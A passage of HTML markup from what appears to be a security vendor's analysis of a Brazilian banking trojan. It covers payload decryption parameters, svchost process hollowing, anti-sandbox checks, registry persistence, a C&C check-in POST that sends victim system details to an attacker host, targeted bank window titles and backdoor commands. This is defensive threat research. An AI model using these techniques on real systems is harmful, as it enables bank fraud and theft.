class=\"rte-circle-bullet\">MyEtherWallet<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Phantom<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Solflare<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">TokenPocket<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Trezor<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Trust Wallet<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The payload decryption is triggered by detecting banking or cryptocurrency-related windows on the victim’s computer (Figure 13). If any of these windows contain keywords related to targeted entities, it proceeds on locating the .tda file (<i>ucJDpQ.tda<\/i>) dropped earlier as part of the MSI installer. If no .tda files were found, it looks for the .dmp file (<i>fKmkzW.dmp<\/i>) instead. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci13.png\" alt=\"Figure 13. Locating, decrypting, and decompressing the payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. Locating, decrypting, and decompressing the payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>Once located, the encrypted payload (either the .tda or .dmp file) is read as binary data and passed through a two-stage decryption and decompression process before it is loaded into the memory:<\/p>\n<ol>\n<li>The payload is decrypted using a custom RC4-like stream cipher with hardcoded parameters (seed=1000, multiplier=3333, increment=3434), which unlocks the compressed executable hidden inside.<\/li>\n<li>The decrypted data is then decompressed using Windows’ native LZNT1 algorithm through the RtlDecompressFragment API, expanding it back into a full PE executable.<\/li>\n<\/ol>\n<p>If a .tda file is present, the AutoIt script decrypts and loads it as an intermediate PE loader (Stage 2) into memory. However, if only a .dmp file is found (no .tda present), the AutoIt script bypasses the intermediate loader entirely and loads the banking trojan directly into the AutoIt process memory, skipping the process hollowing step and running as a simpler two-stage infection.<\/p>\n<p><b>Banking trojan – Second stage<\/b><\/p>\n<p>This loader then searches for additional .dmp or .tda files containing the final banking trojan, decrypts and decompresses the payload using the same routine (Figure 14).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci14.png\" alt=\"Figure 14. Locating the final .dmp or .tda payload file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. Locating the final .dmp or .tda payload file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The loader injects it into a hollowed svchost.exe process to blend with legitimate Windows system processes (Figure 15). It also includes an alternate fallback base address in case virtual memory allocation fails, ensuring the injection process can still proceed (Figures 16 and 17).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci15.png\" alt=\"Figure 15. Create suspended process and allocate memory\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. Create suspended process and allocate memory<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci16.png\" alt=\"Figure 16. Alternate fallback base addresses\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. Alternate fallback base addresses<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci17.png\" alt=\"Figure 17. Resuming a hollowed process after setting thread context and writing the malicious payload into memory\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. Resuming a hollowed process after setting thread context and writing the malicious payload into memory<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p><b>Banking trojan – Persistence<\/b><\/p>\n<p>After the script runs the payload\u2019s entry point, the AutoIt script waits exactly two seconds to give the payload time to complete the process-hollowing routine inside svchost.exe (Figure 18).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci18.png\" alt=\"Figure 18. Loading the decrypted payload into memory and capturing the PID\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. Loading the decrypted payload into memory and capturing the PID<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The script then lists all running svchost.exe process (Figure 19), retrieves their creation timestamp, and identifies the most recent instance which is assumed to be the malicious process where the payload has performed process hollowing. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci19.png\" alt=\"Figure 19. Monitoring the most recent svchost.exe process\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 19. Monitoring the most recent svchost.exe process<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>The script stores the PID of the said svchost.exe process and enters a continuous monitoring loop to regularly check if this specific svchost.exe process is still running. If the process hollowed svchost.exe is terminated the malware resets its state, clears the stored PID, and waits to re-inject the payload the next time the victim opens a banking window, ensuring persistent access to the victim’s banking sessions.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.846774193548\">\n<div readability=\"25.58064516129\">\n<p><b>Banking trojan<\/b><\/p>\n<p>Several behaviors in this sample are similar to those observed in the <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/b\/this-week-in-security-news-zdi-bug-hunters-rake-in-1-5m-in-2019-and-metamorfo-trojan-malware-campaign-targets-online-banking-users.html\" target=\"_blank\">Casbaneiro (Metamorfo)<\/a> banking malware lineage. Like earlier Metamorfo campaigns that relied on a launcher executable invoking AutoIt3 to run a compiled .A3X script alongside a DLL containing the main payload, this sample exhibits the same multi-stage AutoIt-based delivery pattern. This chain ultimately unpacks and activates the banking trojan payload \u2013 mirroring Metamorfo\u2019s signature reliance on AutoIt as a loader framework. Combined with the familiar window title monitoring, registry-based persistence, IMAP-based fallback C&C mechanism, and the presence of tokenlike C&C markers such as <i><||><\/i>, the sample reflects both structural and behavioral continuity with Casbaneiro\/Metamorfo.<i><\/i><\/p>\n<p><b><i>Anti-sandbox analysis<\/i><\/b><\/p>\n<p>Once executed, the payload begins with an aggressive set of anti-virtualization checks designed to evade analysis environments. The malware queries the registry path <i>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\<\/i> specifically looking for the following VM-related services:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">VGAuthService<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vm3dservice<\/span><\/li>\n<li><span class=\"rte-red-bullet\">VMTools<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vmvss<\/span><\/li>\n<\/ul>\n<p>It also enumerates active services to check for the same strings. If any match is found, the malware immediately triggers a custom exception (EEDFADE) via RaiseException, effectively terminating execution to avoid sandbox analysis (Figure 20).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci20.png\" alt=\"Figure 20. Exception triggered that is used for anti-sandbox analysis\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 20. Exception triggered that is used for anti-sandbox analysis<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><b><i>System Profiling via WMI<\/i><\/b><\/p>\n<p>If virtualization is not detected, the payload proceeds to gather host information through multiple WMI queries, including:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">AntiVirusProduct<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_ComputerSystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_OperatingSystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_Processor<\/span><\/li>\n<\/ul>\n<p>The stolen information is later sent to the C&C server as part of the initial check-in.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p><b><i>Registry modification and persistence<\/i><\/b><\/p>\n<p>The malware creates a unique application registry entry under <i>HKEY_CURRENT_USER\\Software\\MyUniqueApp<\/i>, setting <i>UniqueSerial<\/i> to a UUID-generated string. To maintain persistence, it adds itself to the AutoRun registry key at <i>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/i>, pointing the entry to its executable path. It also drops an additional marker under <i>HKEY_CURRENT_USER\\Software\\MeuApp<\/i> by setting <i>inicio = true<\/i>, indicating that the main routine should begin.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"11.5\">\n<p><b><i>C&C check-in communication<\/i><\/b><\/p>\n<p>The payload then connects to its C&C server at <i>hxxps:\/\/serverseistemasatu.com\/data.php?recebe<\/i> and sends a POST request containing system and user information:<\/p>\n<blockquote readability=\"6\"><p>POST \/data.php?recebe HTTP\/1.1<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>User-Agent: DelphiApp<br \/>Host: serverseistemasatu.com<br \/>Content-Length: 267<br \/>Cache-Control: no-cache<\/p>\n<p>nomeRegistro={User name}&nomeComputador={Computer<br \/>name}&nomeSistema={Operating<br \/>System}&processador={Processor}&antivirus={Antivirus<br \/>product}&ultimaAtualizacao={Date}<\/p>\n<\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><b><i>Targeted banking window detection<\/i><\/b><\/p>\n<p>The malware includes a timer-based routine (<i>TForm1_Timer4Timer<\/i>) that continuously scans the titles of active windows to identify whether the user is interacting with banking or cryptocurrency platforms. When a match is found, the malware classifies the detected application based on predefined window title substrings commonly associated with major financial institutions and exchanges (Table 4).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"20\">\n<tr>\n<td valign=\"top\"><b>Category<\/b><\/td>\n<td width=\"0\" valign=\"top\"><b>Window title\/substring<\/b><\/td>\n<td valign=\"top\"><b>Detected as<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"><b>Santander<\/b><\/td>\n<td width=\"0\" valign=\"top\">Santander – Ofertas para Empresas<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Internet banking empresarial – Santander<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Santander –<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Banco do Brasil<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco do Brasil –<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Banco do Brasil e mais<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Autoatendimento Banco do Brasil<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Banrisul<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banrisul Home Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Portal Internet Banrisul Home Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Banrisul Office Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"><b>Tribanco<\/b><\/td>\n<td width=\"0\" valign=\"top\">Tribanco \u00bb Para sua Empresa<\/td>\n<td valign=\"top\">Tribanco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Tribanco \u00bb Para Voc\u00ea<\/td>\n<td valign=\"top\">Tribanco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Bradesco<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco Bradesco<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Net Empresa Bradesco –<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Net Empresa Bradesco<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime –<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime e<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Internet Banking Bradesco:<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Internet Banking Bradesco: Saldos, extratos, Pix e muito mais!<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Exclusive Digital Mais facilidade e autonomia –<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Exclusive Digital Mais facilidade e autonomia<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Para Voc\u00ea<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime Digital Bradesco Prime<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Bradesco Global Private Bank Assessoria de Investimentos Especializada<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">NavegadorExclusivoBradesco.exe<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Sicredi<\/b><\/td>\n<td width=\"0\" valign=\"top\">Sicredi<\/td>\n<td valign=\"top\">Sicredi<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Sicoob<\/b><\/td>\n<td width=\"0\" valign=\"top\">SicoobNet<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Sicoob –<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">sicoob.com.br – SicoobNet<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BMG<\/b><\/td>\n<td width=\"0\" valign=\"top\">Bem-vindo ao seu BMG<\/td>\n<td valign=\"top\">BMG<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">BMG –<\/td>\n<td valign=\"top\">BMG<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BTG Pactual<\/b><\/td>\n<td width=\"0\" valign=\"top\">app.btgpactual.com<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">BTG Pactual –<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">BTG Pactual Empresas<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BS2<\/b><\/td>\n<td width=\"0\" valign=\"top\">app.empresas.bs2.com<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">BS2 –<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Empresas BS2<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Ita\u00fa<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco Ita\u00fa –<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Personnalit\u00e9 I<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Uniclass:<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA –<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA e<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Empresas<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Crypto\/Exchange<\/b><\/td>\n<td width=\"0\" valign=\"top\">Entrar Binance<\/td>\n<td valign=\"top\">Binance<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Iniciar sess\u00e3o Binance<\/td>\n<td valign=\"top\">Binance<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Entre no site da OKX OKX<\/td>\n<td valign=\"top\">OKX<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Crypto.com Log in<\/td>\n<td valign=\"top\">Crypto.com<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Fa\u00e7a o login e acesse a sua conta do Mercado Bitcoin MB<\/td>\n<td valign=\"top\">Mercado Bitcoin<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Coinbase<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Foxbit<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Fa\u00e7a o login e acesse a sua conta do NovaDax NovaDax<\/td>\n<td valign=\"top\">NovaDax<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Fa\u00e7a login e opere Bitget<\/td>\n<td valign=\"top\">Bitget<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Login Bybit<\/td>\n<td valign=\"top\">Bybit<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">– default_wallet<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"> <\/td>\n<td width=\"0\" valign=\"top\">Login – Acesse sua conta Coinext<\/td>\n<td valign=\"top\">Coinext<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 4. predefined window title substrings commonly associated with major financial institutions and exchanges the malware classifies<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p><b><i>IMAP-based secondary C&C discovery<\/i><\/b><\/p>\n<p>The payload uses the same IMAP-based technique previously documented in our recent analysis of the Water Saci campaign, where the malware logs into a terra.com.br mailbox using hardcoded credentials and retrieves an email titled \u201cmeu\u201d to extract an updated C&C address from a line beginning with<i> IP: <\/i>(Figure 21). The key difference is that while the earlier instance appeared only in a recovered auxiliary script, this version incorporates the IMAP routine directly into the injected payload itself, indicating that the operators are reusing the same infrastructure and method, but have now embedded it deeper into the malware\u2019s runtime to make C&C updates more seamless and reliable.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci21.jpg\" alt=\"Figure 21. Function used for the IMAP-based technique C&C retrieval\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 21. Function used for the IMAP-based technique C&C retrieval<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p><b><i>Browser termination routine<\/i><\/b><\/p>\n<p>Before executing credential-related actions, the payload forcibly terminates several browsers:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">chrome.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">firefox.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">msedge.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">NavegadorExclusivoBradesco.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Opera.exe<\/span><\/li>\n<\/ul>\n<p>This behavior is common in banking malware that intercepts sessions or forces victims to reopen banking sites under attacker-controlled conditions.<\/p>\n<p><b><i>Backdoor capabilities<\/i><\/b><\/p>\n<p>The injected payload also includes an extensive set of backdoor commands, granting the operator near complete remote control over the infected system. Table 5 summarizes most of the commands along with their descriptions, providing insight into the full range of actions this banking trojan can execute on a victim\u2019s machine.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"25\">\n<tr>\n<td width=\"147\" valign=\"top\"><b>Category<\/b><\/td>\n<td width=\"213\" valign=\"top\"><b>Command<\/b><\/td>\n<td width=\"263\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"4\" valign=\"top\">Connection Commands<\/td>\n<td width=\"213\" valign=\"top\"><|SocketMain|><\/td>\n<td width=\"263\" valign=\"top\">Main socket communication handler<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|OK |><\/td>\n<td width=\"263\" valign=\"top\">Send system information <|Info|> to C&C server<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|PING|> \/ <|PONG|><\/td>\n<td width=\"263\" valign=\"top\">Network connectivity test<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|Close|><\/td>\n<td width=\"263\" valign=\"top\">Close all active connections<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"147\" valign=\"top\">Authentication and Security<\/td>\n<td width=\"213\" valign=\"top\"><|NOSenha|><\/td>\n<td width=\"263\" valign=\"top\"> Display password error message<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"5\" valign=\"top\">Remote Desktop and Screen Control<\/td>\n<td width=\"213\" valign=\"top\"><|REQUESTKEYBOARD|><\/td>\n<td width=\"263\" valign=\"top\">Enable keyboard capture<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|first|><\/td>\n<td width=\"263\" valign=\"top\">Initialize screen sharing session<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|AtivarImagem|><\/td>\n<td width=\"263\" valign=\"top\">Start screen capturing<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|DesativarImagem|><\/td>\n<td width=\"263\" valign=\"top\">Stop screen capturing<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|AlterarResolucao|><\/td>\n<td width=\"263\" valign=\"top\">Modify screen resolution<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"3\" valign=\"top\">Communication Features<\/td>\n<td width=\"213\" valign=\"top\"><|OpenChat|><\/td>\n<td width=\"263\" rowspan=\"3\" valign=\"top\">Chat Functionality<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|Chat|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|CloseChat|><\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"147\" rowspan=\"19\" valign=\"top\">Mouse Control Commands<\/td>\n<td width=\"213\" valign=\"top\"><|MousePos|><\/td>\n<td width=\"263\" rowspan=\"13\" valign=\"top\">Mouse movement and clicking simulation \u2022 LD\/LU: Left mouse button down\/up \u2022 RD\/RU: Right mouse button down\/up \u2022 MD\/MU: Middle mouse button down\/up<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseLD|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseLD_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseLU|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseLU_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseRD|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseRD_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseRU|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseRU_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseMD|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseMD_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseMU|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseMU_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseWheelUp|><\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Mouse wheel scrolling<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseWheelUp_Volta|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseWheelDown|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MouseWheelDown_Volta|><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|MOUSESENDINPUT|><\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Toggle mouse input method<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MOUSESENDNORMAL|><\/td>\n<\/tr>\n<tr>\n<td width=\"147\" valign=\"top\"> <\/td>\n<td width=\"213\" valign=\"top\"><|LULUZSD|><\/td>\n<td width=\"263\" valign=\"top\"> <\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"4\" valign=\"top\">File System Operations<\/td>\n<td width=\"213\" valign=\"top\"><|Folder|><\/td>\n<td width=\"263\" valign=\"top\">List directories<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|Files|><\/td>\n<td width=\"263\" valign=\"top\">List files in directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|DownloadFile|><\/td>\n<td width=\"263\" 